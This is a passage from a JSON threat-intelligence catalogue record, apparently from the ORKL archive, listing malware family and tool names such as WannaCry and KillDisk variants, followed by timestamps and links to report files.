"WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434355, "ts_updated_at": 1775826716, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/88acd9ab76dad49f70a26ff598c9370694fb24db.pdf", "text": "https://archive.orkl.eu/88acd9ab76dad49f70a26ff598c9370694fb24db.txt", "img": "https://archive.orkl.eu/88acd9ab76dad49f70a26ff598c9370694fb24db.jpg" } }